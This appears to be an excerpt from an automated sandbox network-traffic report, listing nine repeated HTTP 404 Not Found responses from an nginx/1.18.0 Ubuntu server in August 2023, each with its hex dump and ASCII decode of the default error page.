                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:20 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:24 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:34 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:34:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
